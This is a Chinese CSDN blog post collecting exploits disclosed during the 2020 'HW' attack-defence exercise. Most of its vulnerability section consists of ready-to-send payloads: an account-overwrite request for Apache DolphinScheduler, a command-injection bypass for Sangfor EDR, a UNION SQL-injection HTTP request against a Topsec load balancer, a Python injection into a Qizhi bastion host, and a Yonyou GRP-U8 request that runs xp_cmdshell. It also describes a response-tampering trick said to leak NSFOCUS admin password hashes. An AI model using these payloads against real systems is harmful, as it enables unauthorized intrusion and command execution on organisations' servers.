2020 HW记录-2

最新推荐文章于 2024-06-10 09:59:25 发布
最新推荐文章于 2024-06-10 09:59:25 发布
阅读量1.1k 收藏 1
点赞数 1
文章标签: 安全 安全漏洞 数据安全 黑盒测试 web开发
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22807425/article/details/108539879
版权

2020 HW记录-2

0x00 前言


9.11 hw开始了,记录下整个hw期间爆的0day
虽然自己有点想法 有所收获,碍于信息比较敏感的缘故,还是hw结束后再发这儿比较好。
hw可是个学习的好机会啊,冲鸭大伙儿

0x02 漏洞

一.常规漏洞

1.Apache DolphinScheduler高危漏洞


漏洞编号:CVE-2020-11974、CVE-2020-13922

1.1Apache DolphinScheduler权限覆盖漏洞(CVE-2020-13922)

poc

id=1&userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone=

受影响版本

  • Apache DolphinScheduler = 1.2.0、1.2.1、1.3.1

不受影响版本

  • Apache DolphinScheduler >= 1.3.2

1.2Apache DolphinScheduler远程执行代码漏洞(CVE-2020-11974)


受影响版本

  • Apache DolphinScheduler = 1.2.0、1.2.1

不受影响版本

  • Apache DolphinScheduler >= 1.3.1

参考:
https://mp.weixin.qq.com/s/TvT22Wdw-SPBCKcl2pm2Pg

https://www.mail-archive.com/announce@apache.org/msg06076.html

2.WPS 0day

http://zeifan.my/security/rce/heap/2020/09/03/wps-rce-heap.html

二.安全设备漏洞

1.你们懂的-sanX EDR(新版)

绕过:{“params”:“w=123”‘1234123’"|命令"}

结果如下:

![image.png](https://img-service.csdnimg.cn/img_convert/930fdbaf6220fa9a692853ba32cbeadc.png#align=left&display=inline&height=212&margin=[object Object]&name=image.png&originHeight=423&originWidth=894&size=319693&status=done&style=none&width=447)

2.天融信Top-app LB负载均衡SQL注入

天融信TopApp-LB 负载均衡系统sql注入

POST /acc/clsf/report/datasource.php HTTP/1.1
Host:
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57
Content-Type: application/x-www-form-urlencoded
Content-Length: 201
 
t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。

3.绿盟UTS管理员任意登录漏洞

此漏洞据内部人士透露 一个月前已修复并为客户升级

对响应包进行修改,将false更改为true的时候可以泄露管理用户的md5值密码

4.齐治堡垒机

老版本poc

post:
/shterm/listener/tui_update.php
data:
a=["t';import os;os.popen('ls')#"]


据说新版poc是java的


5.联软准入

6.用友GRP-u8 注入


POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache


cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

0x03 author:DesM0nd

其他自留地 https://www.yuque.com/desm0nd/

李瑞宝
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2020HW行动-安全解决方案.pdf
07-05
2020HW行动-安全解决方案
2020HW 之 与其错失良机不如果断出击
Ms08067安全实验室
01-23 609
网络安全知识小百科,就点上方蓝字关注我们出品|MS08067实验室(www.ms08067.com)本文作者:小白鼠1号(投稿)小白鼠1号微信(欢迎骚扰交流):投稿(原创)请发邮件至ro...
2024 HW前需要关注的高危漏洞清单(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
leah126的博客
06-10 656
当前,在规模较大和重要性较高的网络攻防演练中,对于蓝队(防守方),在演练中遇到红队(攻击方)0day的机会还是相当大的,要在短时间达成演习目的,拿到目标靶机的权限,动用一些先进的武器(0day)进行快速突破是最高效的。基于红、蓝双方攻防演练中需要关注的高危漏洞需求,安恒信息CERT、木牛实验室、安全研究院等支撑攻防演练的中台部门及时梳理了近年来在红蓝对抗演练中的高频率漏洞清单,和实近期实际红队任务中依然还暴露的漏洞清单,希望能为蓝队(防守方)提供参考,及时查漏补缺和加固系统,避免遭受攻击失分。
2020 HW记录
qq_22807425的博客
08-19 4740
2020 HW 记录2020 HW行动0x00 0day 列表1-深信服EDR命令执行威胁等级:漏洞描述:payload工具参考2-奇安信天擎EDR管理服务器远程命令执行RCE漏洞威胁等级:漏洞描述:3-天X信dlp 未授权漏洞--应该是以前的4-深信服 vpn rce5-致远OA-A8-V5最新版未授权getshell6-通达OA11.6 preauth RCE0x01 其他 2020 HW行动 0x00 0day 列表 收集2020hw期间的0day资料 1-深信服EDR命令执行 威胁等级: 严重
RCE _通达 OA -2020HW
战神/calmness的博客
09-25 1027
目录 ​描述 2020HW中涉及到的点 影响版本 准备环境 漏洞利用过程 百度一波: 描述 未经授权的攻击者可以通过构造进行任意用户登录(包括admin),登录之后可进一步上传恶意文件控制网站服务器。 通达OA 组织——管理员——邮箱处 存在任意文件上传漏洞,结合系统管理——附件管理——添加存储目录;修改附件上传后保存的路径,最终导致getshell 可以看这篇文章的数据显示 https://www.freebuf.com/company-information/23...
HW研发(Word版本)
12-23
本书通过回顾HW和中国通讯产业的发展历史,深刻地揭示了企业与人才、企业与政府、企业与对手这三组互动关系,并对人才应如何寻找适合自己发展的企业;企业应如何自主创新打造核心竞争力;政府应如何正确扶持企业成长,推动产业发展等问题,提出了很多值得反思和借鉴的建议。 本书为企业家、广大研发人员、政府管理人员、高校教师和研究人员、EMBA、MBA和研究生生等人群,提供了全面完整了解华为自主研发实战经验的精华读本,也是广大关心企业自主研发创新的社会读者必读参考书。
HW2-CodingPipeline
03-21
【标题】"HW2-CodingPipeline" 指的可能是一项关于编程作业或者项目,它涉及到使用Python语言构建一个代码管道。在这个项目中,我们很可能需要处理数据、执行自动化任务或者整合不同的代码模块,以实现高效的工作...
CIS350-HW2-FINN
02-12
标题"CIS350-HW2-FINN"可能代表一个计算机科学课程,可能是"计算机信息系统350"的第二次作业,由唐纳德·芬恩(Donald Finn)完成。这个作业可能涉及到编程相关的任务,因为提到了编程语言的经验。 唐纳德·芬恩在...
hw2-metaSearch:作业2
05-05
【标题】:“hw2-metaSearch:作业2” 这个标题表明我们正在探讨一个关于“元搜索”的项目,可能是某个在线课程或编程挑战的第二部分。元搜索引擎并不直接抓取网页,而是通过集成多个搜索引擎的结果来提供更全面的...
2023-HW-POC
09-20
"EXP"可能代表"Experiment"(实验)或者"Exploration"(探索),暗示了这个文件包含了该项目进行的各种实验和探索过程的记录。 详细知识点: 1. **硬件设计**:POC可能涉及到新的硬件架构设计,比如定制的处理器、...
CS4710-HW2-testcase-generate
03-14
在这个名为"CS4710-HW2-testcase-generate"的项目中,我们关注的是自动化生成硬件测试用例的方法,特别是在JavaScript环境中实现这一目标。 JavaScript,通常与Web开发关联,其实也有广泛的应用于非浏览器环境,如...
ml2020spring-hw1.zip
03-31
李宏毅2020深度学习HomeWork1数据集,sample_submissiong.csv,test.csv,train.csv
HW 硬件更新下载包
04-02
HW 硬件更新下载包包含文件HWUpdates\hspcontents.xml .........\s7h0003x.hsp .........\s7h0004x.hsp .........\s7h0005x.hsp .........\s7h0006x.hsp .........\s7h0008x.hsp .........\s7h0009x.hsp .........\s7h0012x.hsp .........\s7h0013x.hsp .........\s7h0014x.hsp .........\s7h0015x.hsp .........\s7h0016x.hsp .........\s7h0017x.hsp .........\s7h0018x.hsp .........\s7h0019x.hsp .........\s7h0020x.hsp .........\s7h0023x.hsp .........\s7h0024x.hsp .........\s7h0025x.hsp .........\s7h0033x.hsp .........\s7h0034x.hsp .........\s7h0035x.hsp .........\s7h0036x.hsp .........\s7h0037x.hsp .........\s7h0038x.hsp .........\s7h0039x.hsp .........\s7h0040x.hsp .........\s7h0042x.hsp .........\s7h0043x.hsp .........\s7h0044x.hsp .........\s7h0045x.hsp .........\s7h0046x.hsp .........\s7h0047x.hsp .........\s7h0048x.hsp .........\s7h0049x.hsp .........\s7h0050x.hsp .........\s7h0051x.hsp .........\s7h0052x.hsp .........\s7h0053x.hsp .........\s7h0054x.hsp .........\s7h0055x.hsp .........\s7h0056x.hsp .........\s7h0057x.hsp .........\s7h0058x.hsp .........\s7h0060x.hsp .........\s7h0061x.hsp .........\s7h0063x.hsp .........\s7h0064x.hsp .........\s7h0065x.hsp .........\s7h0066x.hsp .........\s7h0067x.hsp .........\s7h0068x.hsp .........\s7h0069x.hsp .........\s7h0070x.hsp .........\s7h0071x.hsp .........\s7h0072x.hsp .........\s7h0073x.hsp .........\s7h0074x.hsp .........\s7h0075x.hsp .........\s7h0076x.hsp .........\s7h0077x.hsp .........\s7h0078x.hsp .........\s7h0079x.hsp .........\s7h0080x.hsp .........\s7h0081x.hsp .........\s7h0082x.hsp .........\s7h0083x.hsp .........\s7h0084x.hsp .........\s7h0085x.hsp .........\s7h0087x.hsp .........\s7h0088x.hsp .........\s7h0089x.hsp .........\s7h0092x.hsp .........\s7h0093x.hsp .........\s7h0094x.hsp .........\s7h0095x.hsp .........\s7h0096x.hsp .........\s7h0097x.hsp .........\s7h0098x.hsp .........\s7h0099x.hsp .........\s7h0101x.hsp .........\s7h0102x.hsp .........\s7h0103x.hsp .........\s7h0104x.hsp .........\s7h0105x.hsp .........\s7h0106x.hsp .........\s7h0107x.hsp .........\s7h0108x.hsp .........\s7h0109x.hsp .........\s7h0110x.hsp .........\s7h0111x.hsp .........\s7h0112x.hsp .........\s7h0113x.hsp .........\s7h0114x.hsp .........\s7h0115x.hsp .........\s7h0116x.hsp .........\s7h0117x.hsp .........\s7h0118x.hsp .........\s7h0119x.hsp .........\s7h0120x.hsp
2020HW必备-蜜罐如何在攻防演练中战术部防
zhangge3663的博客
09-17 2332
原创作者:长亭科技,已获授权。 文末记得获取《红蓝对抗——蓝队手册》,或许对你目前的HW工作有参考价值。 网络攻防演练活动以模拟真实攻击为重要标准,对参与演练单位的各类系统进行渗透,通过设定演练规则,根据统计攻击和防守方得失分情况,判定防守方防护能力水平。在这个过程中,防守方对攻击方是谁、从哪里发动攻击、用何种手段均一无所知,处于“攻防不对称”下的天然劣势。 本次我们将以某个行业开展的攻防演练活动为示例,从防守方的视角,看其怎样利用欺骗伪装技术,实现主动对抗,及时诱捕、发现、处置、溯源,甚至..
用友grp-u8SQL注入&命令执行
MD@@nr丫卡uer
11-20 5539
用友grp-u8SQL注入&命令执行 fofa搜索语句 title=“GRP-U8” 1、查询版本信息:select @@version 2、验证是否为sa权限:select IS_SRVROLEMEMBER(‘sysadmin’) //返回 1,说明是sa权限,可执行sql语句。 3、判断目标机的MSSQL服务是否存在xp_cmdshell扩展存储过程: select count(*) from master.dbo.sysobjects where xtype=‘x’ and name=‘xp_
2023 HW 必修高危漏洞集合
holyxp的博客
07-21 3235
高危风险漏洞一直是企业网络安全防护的薄弱点,也成为 HW 攻防演练期间红队的重要突破口;每年 HW 期间爆发了大量的高危风险漏洞成为红队突破网络边界防护的一把利器,很多企业因为这些高危漏洞而导致整个防御体系被突破、甚至靶标失守而遗憾出局。HW 攻防演练在即,输出HW 必修高危漏洞手册,意在帮助企业在 HW 攻防演练的前期进行自我风险排查,降低因高危漏洞而“城池失守”的风险。
【漏洞复现】联软科技安全准入门户平台RCE(命令执行)漏洞
做自己喜欢的事,并将其发挥到极致!
06-06 2123
联软科技安全准入门户平台 commondRetStr处存在远程代码执行漏洞,攻击者可以获取服务器权限。
联软科技产品「准入」存在任意文件上传和命令执行漏洞
m0_48520508的博客
09-25 4994
1、准入系统概述 网络准入这一概念是由思科发起、后续由华为、联软、北信源等多家厂商根据此概念,基于在NACC、802.1x、EOU、WebAuth、MAB、IAB的基础上进行自主研发的一门新兴技术。其宗旨是防止病毒和蠕虫等新兴黑客技术对企业安全造成危害,为企业建设一套网络安全体系。 2、联软UniNAC网络准入控制系统功能 • 发现 自动发现网络设备、自动发现接入设备、自动发现网络拓扑; 自动发现接入设备的类型,包
华为 camera 100-hw
08-26
华为camera 100-hw是一款华为公司生产的相机产品。作为华为品牌的一部分,该相机具有出色的性能和先进的技术特点。 首先,华为camera 100-hw采用了高清分辨率的镜头和传感器,能够捕捉到更加细致和清晰的图像。不论是拍摄风景、人物还是细节,该相机都能够呈现出非常精彩的影像效果。 其次,华为camera 100-hw还具备强大的防抖功能,能够有效减少手持拍摄时的抖动,使拍摄出的照片更加稳定和清晰。 此外,该相机还配备了多种不同的摄影模式和滤镜效果,使用户可以根据自己的需求和创意来调整拍摄风格和色调,以实现更加个性化的照片效果。 华为camera 100-hw还具备便携性强的特点,便于携带和使用。无论是旅行、摄影爱好者还是日常生活中的点滴记录,用户都可以轻松地将该相机携带到任何地方,并拍摄出令人满意的照片。 综上所述,华为camera 100-hw是一款性能优越、技术先进的相机产品。无论是从图片质量、防抖能力还是创意调节方面来看,都能满足用户的需求,并呈现出令人惊艳的画面效果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值